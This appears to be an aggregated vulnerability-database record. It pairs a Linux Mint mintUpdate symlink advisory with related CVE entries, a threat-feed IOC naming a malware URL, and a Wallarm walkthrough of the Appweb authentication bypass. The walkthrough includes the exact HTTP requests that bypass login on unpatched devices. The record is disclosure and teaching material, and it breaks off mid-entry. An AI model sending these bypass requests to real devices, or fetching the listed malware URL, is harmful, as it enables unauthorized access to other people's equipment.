{"id": "SECURITYVULNS:DOC:23897", "bulletinFamily": "software", "title": "Linux Mint 8 mintUpdate Insecure Temporary File Creation", "description": "======================================================================\r\nLinux Mint 8 mintUpdate Insecure Temporary File Creation\r\n======================================================================\r\n\r\nAuthor: L4teral <l4teral [at] gmail com>\r\nImpact: Privilege Escalation\r\nStatus: Update available\r\n\r\n\r\n------------------------------\r\nAffected software description:\r\n------------------------------\r\n\r\nApplication: mintUpdate (Linux Mint)\r\nVersion: Linux Mint 8\r\nVendor: http://linuxmint.com\r\n\r\nDescription:\r\nLinux Mint's purpose is to produce an elegant, up to date and\r\ncomfortable GNU/Linux desktop distribution.\r\n\r\n\r\n--------------\r\nVulnerability:\r\n--------------\r\n\r\nThe Linux Mint update tool mintUpdate creates temporary files in the\r\n/tmp/mintUpdate/ directory in an insecure way. This can be exploited\r\nto overwrite restricted files via symlink attacks.\r\n\r\n\r\n------------\r\nPoC/Exploit:\r\n------------\r\n\r\nThe symlinks must exist when the user clicks on the mintUpdate Icon.\r\nAfter requesting root privileges via sudo, the update tool overwrites\r\nthe target file with log data. This could be exploited to destroy\r\ncrucial system files.\r\n\r\n\r\n---------\r\nSolution:\r\n---------\r\n\r\nUpdate to Linux Mint 9\r\nor apply the following patch:\r\nhttp://github.com/linuxmint/mintupdate/commit/301993906c694eb119cd9614817de57e7b0c874c\r\n\r\n\r\n---------\r\nTimeline:\r\n---------\r\n\r\n2010-03-08 - vendor informed\r\n2010-03-17 - vendor response, patched in source repository\r\n2010-05-18 - Linux Mint 9 released, public disclosure", "published": "2010-05-21T00:00:00", "modified": "2010-05-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23897", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:34", "edition": 1, "viewCount": 0, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-08-31T11:10:34", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB983590", "KB971092", "KB953297", "KB3127904", "KB3178702", "KB3046306", "KB2160841", "KB2454823", "KB3115294", "KB979688"]}], "modified": "2018-08-31T11:10:34", "rev": 2}, "vulnersScore": -0.0}, "affectedSoftware": []}

{"rst": [{"lastseen": "2020-11-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **122[.]160.196.105:23897/.i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **16**.\n First seen: 2020-07-22T03:00:00, Last seen: 2020-11-16T03:00:00.\n IOC tags: **malware**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-22T00:00:00", "id": "RST:246A1B72-ACF9-3CCD-94A0-F68257238A55", "href": "", "published": "2020-11-18T00:00:00", "title": "RST Threat feed. IOC: 122.160.196.105:23897/.i", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wallarmlab": [{"lastseen": "2019-05-29T16:19:43", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8715"], "description": "### How IoT can pave the way for data breaches: Understanding the _Appweb Authorization Bypass_\n\n#### An engineering POV into everyday vulnerability.\n\nThe everyday things you rely on may leave you vulnerable to attack. And it may not be the things themselves, but what is hiding inside. Are your IoT devices, printers, and otherwise friendly, functional helpers vectors for data breaches?\n\nWe have to look into the tiny software component embedded in millions of machines to understand why their security is often inadequate. This is the story of Appweb: a web management interface for your commonplace household devices that can open the door into your homes to hackers.\n\nEvery day, we rely on the IoT for printers, music, and even our thermostat. Are we safe from hackers?\n\n### What is the security threat inside your trusted device?\n\nEvery device you interact with \u2014 and the devices that interact with each other, like your Nest thermostat \u2014 has an interface. That interface may not even be visible, unlike a cell phone\u2019s surface. It may be the \u201cpersonality\u201d of your Alexa. Inside your IoT devices is a tiny web server that manages the interface. It takes up as little as 2MB of memory. This tiny server supports all modern protocols. Appweb operates in the server of functional devices like printers, routers, IP phones, and WIFI. This software runs in millions of everyday devices made by household and office giants like Kodak and Oracle ([check out the bigger list!](<https://www.embedthis.com/#users>)).\n\nThe extent of the Appweb Unauthorized Bypass vulnerability from on [Shodan](<https://www.shodan.io/>).\n\n[Appweb](<https://nvd.nist.gov/vuln/detail/CVE-2018-8715>) is one of those little servers that can cause big problems. Versions of the Appweb server (4 to 7.0.2) had a logic flaw \u2014 an \u201cauthorization bypass vulnerability\u201d \u2014 that left devices vulnerable to hackers.\n\nAs ethical hackers, we decided to test whether the fixes were solid. We ran our own security tests to see if your devices really are as safe as they claim on the website.\n\nAppweb claims \u201cunmatched security.\u201don their website. They were able to fix the logic flaw. However, the problem allowed us a unique opportunity. First, the following engineering exercise shows the possible risks of unpatched software. As whitehat hackers, it also allows us to show discovery methods to defense engineers on how to look for 0-delay problems of a similar nature.We ran our own security tests, to see if your devices really are as safe as they claim.\n\n### Appweb: Selling you a bill of goods, and a dangerous IoT\n\nThe official spiel on Appweb\u2019s site is that a main benefit of the server is its security. We didn\u2019t want to accept the hype off the cuff. Our job is to hack the system better than hackers \u2014 test better than, well, testers. Wallarm Labs took a deeper look at least one issue that goes contrary to Appweb claim of unmatched security. Below, we are going to list the technical tests we ran (you can test along with us, if you like.) We didn\u2019t like how easy it would be to exploit this vulnerability.\n\n[Note: **you should update or fix any device you have with Appweb on it, though they have fixed the discovered vulnerability.**]\n\nSecurity is advertised as \u201cunmatched\u201d, but vulnerabilities can still exist \u2014 hidden in unnoticed locations.\n\nWe have demonstrated below with code and examples the IOT authentication vulnerability that we mentioned is real.\n\nGranted, the IoT authentication vulnerability that lets hackers in did get fixed in the newest version of the [EmbedThis Appweb](<https://www.embedthis.com/>) server. An update may help you out. Developers added correct checks for what _httpGetCredential_ function returns and username and password NULL pointer checks inside the formParse. (Look at the [commit](<https://github.com/embedthis/appweb/commit/5e1c2a9f72c3327832ce95ed79e2394449861ea3#diff-656121b1dd9fc70f0919142e1300fbde>) which fixes the vulnerability.)\n\nStill, not everything is sunshine and carefree rainbows. Many of the IoT devices using AppWeb never update the firmware or do it rarely. And that is where we found vulnerabilities running amok. Your printers, scanners and routers may still be vulnerable if not updated.\n\n\n\n### How we tested Appweb\u2019s security: A follow-along security exercise for engineers.\n\nHere is how we tested Appweb\u2019s claim to having front-page level security.\n\nFirst, we created a testing infrastructure (using a Docker container with [Debian Linux](<https://www.debian.org/>) onboard).\n\ndocker run \u2014 rm -p80:80 -ti \u2014 cap-add=SYS_PTRACE \u2014 security-opt seccomp=unconfined \u2014 name=appweb \u2014 hostname=appweb debian /bin/bash\n\nThen we installed some dependencies. (Because Appweb is written in C, we used GCC to make it easy to compile.) apt update &amp;&amp; apt install \u2014 no-install-recommends -y ca-certificates wget nano make procps gcc libc6-dev\n\n[**If you\u2019re testing along, to debug the application with us install gdb and pwndbg tools**.]\n\napt install \u2014 no-install-recommends -y git gdb \ncd ~ \ngit clone[ https://github.com/pwndbg/pwndbg](<https://github.com/pwndbg/pwndbg>) \ncd pwndbg \n./setup.sh\n\nNext, download Appweb version 7.0.2 \u2014 the last vulnerable version.\n\nmkdir -p /usr/src/appweb &amp;&amp; cd /usr/src/appweb \nwget \u2014 no-check-certificate -qO-<https://github.com/embedthis/appweb/archive/v7.0.2.tar.gz> | tar zx \u2014 strip-components=1\n\nNow we need to compile a web server and install it.\n\nmake &amp;&amp; make install \nRun make with a debug flag to compile with debugging symbols. \nDEBUG=debug make &amp;&amp; make install\n\n\n\nAfter successful installation, you need to change the configuration file \u2014 /etc/appweb/install.conf. You can define IP address or/and port where web server will bind in _Listen_ directive.\n\n/etc/appweb/install.conf: \nset LOG_DIR \u201c/var/log/appweb\u201d \nset CACHE_DIR \u201c/var/spool/appweb/cache\u201d \nDocuments \u201c/var/www/appweb\u201d \nListen 80 \n&lt;if SSL_MODULE&gt; \nListenSecure 443 \n&lt;/if&gt;\n\nStart Appweb with \u2014 verbose flag to display debug information on the console.\n\n\n\nDuring analysis we\u2019ll change configuration file from time to time so please don\u2019t put your trusted editor like nano too far away. ;)\n\n### Vulnerability analysis\n\nAt this point, we are ready to look at the source code of Appweb. We need to open Embedthis HTTP library source directory, found inside _src/http_path.\n\nThe vulnerability exists in the authCondition function. It has a logic flaw in the authentication check process.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14558: /* \n14559: This condition is used to implement all user authentication for routes \n14560: */ \n14561: static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op) \n14562: { \n14563: HttpAuth *auth; \n14564: cchar *username, *password;\n\nFirst, it checks _if authentication_ exists at the requested path. If it\u2019s not needed, then the function _exits and_ returns _HTTP_ROUTE_OK_ constant which tells an application to continue processing the user request.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14569: auth = route-&gt;auth; \n14570: if (!auth || !auth-&gt;type) { \n14571: /* Authentication not required */ \n14572: return HTTP_ROUTE_OK; \n14573: }\n\nAt this moment we don\u2019t have any protected path in our testing environment. Let\u2019s fix that misconception. Edit server config to enable authentication and restart it. Create user _takeme_ with a random password.\n\n/etc/appweb/install.conf: \nset LOG_DIR \u201c/var/log/appweb\u201d \nset CACHE_DIR \u201c/var/spool/appweb/cache\u201d \nDocuments \u201c/var/www/appweb\u201d \nListen 80 \n&lt;if SSL_MODULE&gt; \nListenSecure 443 \n&lt;/if&gt; \nAddHandler fileHandler \nAuthStore config \nAuthType basic appweb.local \nUser takeme 314b6053a96b25b4a6538996af4377ec user\n\n\n\nOk, auth enabled we can move next by code flow. When a user sends a login password combination to the server _httpIsAuthenticated_ is called. That function performs a session check that the current user has already successfully logged in before.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14574: if (!httpIsAuthenticated(conn)) { \n/appweb-7.0.2/src/http/httpLib.c: \n1677: PUBLIC bool httpIsAuthenticated(HttpConn *conn) \n1678: { \n1679: return httpAuthenticate(conn); \n1680: } \n/appweb-7.0.2/src/http/httpLib.c: \n1526: /*\n\n1527: Authenticate a user using the session stored username. This will set HttpRx.authenticated if authentication succeeds.\n\n1528: Note: this does not call httpLogin except for auto-login cases where a password is not used.\n\n1529: */ \n1530: PUBLIC bool httpAuthenticate(HttpConn *conn) \n1531: { \n1532: HttpRx *rx; \n1533: HttpAuth *auth; \n1534: cchar *ip, *username; \n1535: \n1536: rx = conn-&gt;rx; \n1537: auth = rx-&gt;route-&gt;auth; \n1538: \n1539: if (!rx-&gt;authenticateProbed) { \n1540: rx-&gt;authenticateProbed = 1; \n1541: ip = httpGetSessionVar(conn, HTTP_SESSION_IP, 0); \n1542: username = httpGetSessionVar(conn, HTTP_SESSION_USERNAME, 0); \n1543: if (!smatch(ip, conn-&gt;ip) || !username) { \n1544: if (auth-&gt;username &amp;&amp; *auth-&gt;username) { \n1545: /* Auto-login */ \n1546: httpLogin(conn, auth-&gt;username, NULL); \n1547: username = httpGetSessionVar(conn, HTTP_SESSION_USERNAME, 0); \n1548: } \n1549: if (!username) { \n1550: return 0; \n1551: } \n552: }\n\nIf that check fails then _httpGetCredentials_ function take a control.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14574: if (!httpIsAuthenticated(conn)) { \n14575: httpGetCredentials(conn, &amp;username, &amp;password);\n\nNow let\u2019s see how it really works with a debugger. Run Appweb through gdb and set a breakpoint to _httpGetCredentials_.\n\ncd /etc/appweb/ \ngdb \u2014 args appweb \u2014 verbose \nset breakpoint pending on \nb httpGetCredentials \nr\n\nLoad index page, enter any login/password combination and after sending it to the server breakpoint is triggered.\n\n/appweb-7.0.2/src/http/httpLib.c: \n1647: PUBLIC bool httpGetCredentials(HttpConn *conn, cchar **username, cchar **password) \n1648: { \n1649: HttpAuth *auth; \n1650: \n1651: assert(username); \n1652: assert(password); \n1653: *username = *password = NULL;\n\n\n\nIn the config file we set up an authorization type to the _basic_. You can see that in debugger auth-&gt;type-&gt;name variable.\n\n\n\nBasic authentication credentials parsed inside _httpBasicParse_ function, see _auth-&gt;type-&gt;parseAuth_ variable.\n\n/appweb-7.0.2/src/http/httpLib.c: \n1666: if (auth-&gt;type-&gt;parseAuth &amp;&amp; (auth-&gt;type-&gt;parseAuth)(conn, username, password) &lt; 0) { \n1667: return 0; \n1668: }\n\n\n\nThat function does base64 decode and splits login/password sequence to two parts, and after that, we have variables with the same names.\n\n/appweb-7.0.2/src/http/httpLib.c: \n2111: PUBLIC int httpBasicParse(HttpConn *conn, cchar **username, cchar **password) \n2112: {\n\n\u2026\n\n2126: if ((decoded = mprDecode64(rx-&gt;authDetails)) == 0) { \n2127: return MPR_ERR_BAD_FORMAT; \n2128: } \n2129: if ((cp = strchr(decoded, \u2018:\u2019)) != 0) { \n2130: *cp++ = \u2018\\0\u2019; \n2131: } \n2132: conn-&gt;encoded = 0; \n2133: if (username) { \n2134: *username = sclone(decoded); \n2135: } \n2136: if (password) { \n2137: *password = sclone(cp); \n2138: } \n2139: return 0;\n\n\n\nNext, control goes to _httpLogin_ function where you can find all authorization logic. Set a breakpoint there. When all prechecks have completed then in _verifyUser_ variables stored the name of the function which calls with our credentials as arguments. It is configVerifyUser because we set up that in the configuration file.\n\n\n\n/appweb-7.0.2/src/http/httpLib.c: \n2018: static bool configVerifyUser(HttpConn *conn, cchar *username, cchar *password) \n2019: { \n2020: HttpRx *rx; \n2021: HttpAuth *auth; \n2022: bool success; \n2023: char *requiredPassword; \n2024: \n2025: rx = conn-&gt;rx; \n2026: auth = rx-&gt;route-&gt;auth; \n2027: if (!conn-&gt;user &amp;&amp; (conn-&gt;user = mprLookupKey(auth-&gt;userCache, username)) == 0) { \n2028: httpTrace(conn, \u201cauth.login.error\u201d, \u201cerror\u201d, \u201cmsg: \u2018Unknown user\u2019, username:\u2019%s\u2019\u201d, username); \n2029: return 0; \n2030: }\n\nFirst, we will try to guess a valid username (bruteforce). I will deliberately use a wrong password then _mprLookupKey_ will return false and the server will return a _auth.login.error_.\n\n\n\nWith a valid login and a wrong password, you get the same type error, but a message will be \u201c_Password failed to authenticate_\u201d.\n\n\n\nIt appears that the basic authorization works well.\n\nNo vulnerabilities here, folks, move on. If only\u2026\n\nThe basic type of authorization works fine, but what if we want to change the method from old basic access authentication to \u201cmodern\u201d digest access authentication.\n\n/etc/appweb/install.conf: \nDocuments \u201c/var/www/appweb\u201d \nListen 80 \nAddHandler fileHandler \nAuthStore config \nAuthType digest appweb.local \nUser takeme 314b6053a96b25b4a6538996af4377ec user\n\nThis verification can be done without sending the clear password which should be good for security. Right? Let\u2019s see how it\u2019s implemented here. First, send request with valid username _takeme_ and without any authorization information.\n\nGET / HTTP/1.1 \nHost: appweb.local \nConnection: close \nAuthorization: Digest username=takeme\n\nThis time credentials are parsed by the httpDigestParse function.\n\n\n\nThere are parsing bunch of digest auth parameters like realm, nonce, opaque, etc. For that purposes, program allocates _HttpDigest_ structure.\n\n\n\nNext, string from _Authorization_ header will split by \u201c,\u201d and \u201c=\u201d symbols.\n\n/appweb-7.0.2/src/http/httpLib.c: \n6690: dp = conn-&gt;authData = mprAllocObj(HttpDigest, manageDigestData); \n6691: key = sclone(rx-&gt;authDetails);\n\n\u2026\n\n6693: while (*key) { \n6694: while (*key &amp;&amp; isspace((uchar) *key)) { \n6695: key++; \n6696: } \n6697: tok = key; \n6698: while (*tok &amp;&amp; !isspace((uchar) *tok) &amp;&amp; *tok != \u2018,\u2019 &amp;&amp; *tok != \u2018=\u2019) { \n6699: tok++; \n6700: }\n\n\u2026\n\n6707: seenComma = 0;\n\nWe provide only the username option in the request.\n\n\n\nThe function returns an error about wrong digest format MPR_ERR_BAD_FORMAT because of that.\n\n/appweb-7.0.2/src/mpr/mpr.h: \n240: #define MPR_ERR_BAD_FORMAT -5 /**&lt; Bad input format */\n\n\n\nThe httpGetCredentials function returns 0 because if condition has been met (-5 &lt; 0).\n\n\n\nBut it\u2019s not a big deal while results of the httpGetCredentials don\u2019t check. The httpLogin is called anyway.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14575: httpGetCredentials(conn, &amp;username, &amp;password); \n14576: if (!httpLogin(conn, username, password)) {\n\n\n\nThus, valid username \u201ctakeme\u201d and _NULL_ password pass as arguments. It\u2019s the first logical miss.\n\n\n\nMoving on, the configVerifyUser function, our old friend, is used to validate the proof of supplied credentials.\n\n\n\nBut this time the condition is false, and part of the code that checks passwords will be ignored and the flow jumps to end of the function. There is \u201creturn 1\u201d code construction helps us to successfully bypass authentication.\n\n\n\nIt\u2019s the second logical issue after that return execution flow jumps to the line 1720 and a new user session is created.\n\n/appweb-7.0.2/src/http/httpLib.c: \n1717: if (!(verifyUser)(conn, username, password)) { \n1718: return 0; \n1719: } \n1720: if (!(auth-&gt;flags &amp; HTTP_AUTH_NO_SESSION) &amp;&amp; !auth-&gt;store-&gt;noSession) { \n1721: if ((session = httpCreateSession(conn)) == 0) { \n1722: /* Too many sessions */ \n1723: return 0; \n1724: } \n1725: httpSetSessionVar(conn, HTTP_SESSION_USERNAME, username); \n1726: httpSetSessionVar(conn, HTTP_SESSION_IP, conn-&gt;ip); \n1727: } \n1728: rx-&gt;authenticated = 1; \n1729: rx-&gt;authenticateProbed = 1; \n1730: conn-&gt;username = sclone(username); \n1731: conn-&gt;encoded = 0; \n1732: return 1;\n\n\n\nWith the valid session, we return to the authCondition.\n\n/ppweb-7.0.2/src/http/httpLib.c: \n14561: static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op) \n14562: {\n\n\u2026\n\n14574: if (!httpIsAuthenticated(conn)) { \n14575: httpGetCredentials(conn, &amp;username, &amp;password); \n14576: if (!httpLogin(conn, username, password)) {\n\n\u2026\n\n14587: } \n14588: if (!httpCanUser(conn, NULL)) {\n\n\u2026\n\n14594: } \n14595: /* OK to accept route. This does not mean the request was authenticated \u2014 an error may have been already generated */ \n14596: return HTTP_ROUTE_OK; \n14597: }\n\nSession returns in server response as cookie.\n\n\n\nNext time you send requests using that session httpIsAuthenticated function will return -1 and skips the other checks.\n\n/appweb-7.0.2/src/http/httpLib.c: \n14561: static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op) \n14562: {\n\n\u2026\n\n14574: if (!httpIsAuthenticated(conn)) {\n\n\u2026\n\n14587: }\n\n\u2026\n\n14596: return HTTP_ROUTE_OK; \n14597: } \n/appweb-7.0.2/paks/http/dist/httpLib.c: \n1677: PUBLIC bool httpIsAuthenticated(HttpConn *conn) \n1678: { \n1679: return httpAuthenticate(conn); \n/appweb-7.0.2/src/http/httpLib.c: \n1530: PUBLIC bool httpAuthenticate(HttpConn *conn) \n1531: { \n1532: HttpRx *rx; \n1533: HttpAuth *auth; \n1534: cchar *ip, *username; \n1535: \n1536: rx = conn-&gt;rx; \n1537: auth = rx-&gt;route-&gt;auth; \n1538: \n1539: if (!rx-&gt;authenticateProbed) {\n\n\u2026\n\n1558: return rx-&gt;authenticated; \n1559: }\n\n\n\nThe same problem exists when you use form-based authorization.\n\n/etc/appweb/install.conf: \nDocuments \u201c/var/www/appweb\u201d \nListen 80 \nAddHandler fileHandler \nAuthStore config \nAuthType form appweb.local \nUser takeme 314b6053a96b25b4a6538996af4377ec user \nWhen you send POST without password parameter, \nPOST / HTTP/1.1 \nHost: appweb.local \nConnection: close \nusername=takeme\n\nThen request parser formParse logic works incorrectly and httpGetParamfunction set _password_ to a _NULL_ pointer. If we don\u2019t have any attribute with name \u201cpassword\u201d, then return _defaultValue_ as a variable. But _defaultValue_passed as a third argument when code calls the httpGetParam, and it is 0.\n\n/appweb-7.0.2/src/http/httpLib.c: \n2073: PUBLIC int formParse(HttpConn *conn, cchar **username, cchar **password) \n2074: { \n2075: *username = httpGetParam(conn, \u201cusername\u201d, 0); \n2076: *password = httpGetParam(conn, \u201cpassword\u201d, 0); \n2077: return 0; \n2078: } \n/appweb-7.0.2/src/http/httpLib.c: \n22598: PUBLIC cchar *httpGetParam(HttpConn *conn, cchar *var, cchar *defaultValue) \n22599: { \n22600: cchar *value; \n22601: \n22602: value = mprReadJson(httpGetParams(conn), var); \n22603: return (value) ? value : defaultValue; \n22604: }\n\n\n\nThe result is the same as in the digest case \u2014 auth bypass.\n\n\n\nIf we return to basic auth type now, then we understand why this method cannot be used for a successful exploitation. Look at the httpBasicParsefunction.\n\n/appweb-7.0.2/src/http/httpLib.c: \n2111: PUBLIC int httpBasicParse(HttpConn *conn, cchar **username, cchar **password) \n2112: {\n\n\u2026\n\n2123: if (!rx-&gt;authDetails) { \n2124: return 0; \n2125: } \n2126: if ((decoded = mprDecode64(rx-&gt;authDetails)) == 0) { \n2127: return MPR_ERR_BAD_FORMAT; \n2128: }\n\n\u2026\n\n2133: if (username) { \n2134: *username = sclone(decoded); \n2135: } \n2136: if (password) { \n2137: *password = sclone(cp);2138: }\n\nIn any case, sclone is called for _password_ and _username_.\n\n/appweb-7.0.2/src/mpr/mprLib.c: \n23890: PUBLIC char *sclone(cchar *str) \n23891: { \n23892: char *ptr; \n23893: ssize size, len; \n23894: \n23895: if (str == 0) { \n23896: str = \u201c\u201d; \n23897: } \n23898: len = slen(str); \n23899: size = len + 1; \n23900: if ((ptr = mprAlloc(size)) != 0) { \n23901: memcpy(ptr, str, len); \n23902: ptr[len] = \u2018\\0\u2019; \n23903: } \n23904: return ptr; \n23905: }\n\nBut the sclone returns a valid pointer always even if you didn\u2019t pass password attribute.\n\n### Conclusion\n\nIf you\u2019ve followed along with the testing, you realize that the older version of software allow bad actors to make changes to your IoT devices, install spyware or worse without any kind of authentication.\n\nOur recommendation is to check what software your devices are running on. If there are products powered by EmbedThis software, schedule a service call and get the firmware flashed.\n\n#securityengineer #devsecops #cybersecurity #vulnerabilitydetection #hackers #whitehat #applicationsecurity #IoT\n\n\n\n* * *\n\n[Can your Printer Hack your Secrets: Appweb Authorization Bypass](<https://lab.wallarm.com/can-your-printer-hack-your-secrets-appweb-authorization-bypass-c609cf9024a7>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2019-04-23T18:13:18", "published": "2019-02-28T15:45:23", "id": "WALLARMLAB:FFA8AFCAD5B1D254095419667B30984F", "href": "https://lab.wallarm.com/can-your-printer-hack-your-secrets-appweb-authorization-bypass-c609cf9024a7?source=rss----49b51199b3da---4", "type": "wallarmlab", "title": "Can your Printer Hack your Secrets: Appweb Authorization Bypass", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2018-02-01T15:59:50", "bulletinFamily": "blog", "cvelist": [], "description": "Good morning! Sit with Carbon Black this morning over a cup of coffee (or tea) and browse a few industry headlines to get the day started. We\u2019ve got just enough information below to get you through that first cup\u2026enjoy!\n\n**February 1, 2018 - Headlines \n**\n\n**Carbon Black in the News: **[Kim Jong Nam met mysterious American](<http://www.cnn.com/videos/tv/2018/02/01/exp-tsr-todd-kim-jong-nam-met-with-american-days-before-assassination.cnn>) - CNN\n\n**Carbon Black in the News:** [2018 Cybersecurity Product Awards \u2013 Finalists](<https://cybersecurity-excellence-awards.com/2018-cybersecurity-product-awards>)\n\n**Carbon Black in the News: ** [2018 Cybersecurity Company Awards \u2013 Finalists](<https://cybersecurity-excellence-awards.com/2018-cybersecurity-company-awards>)\n\n**Carbon Black in the 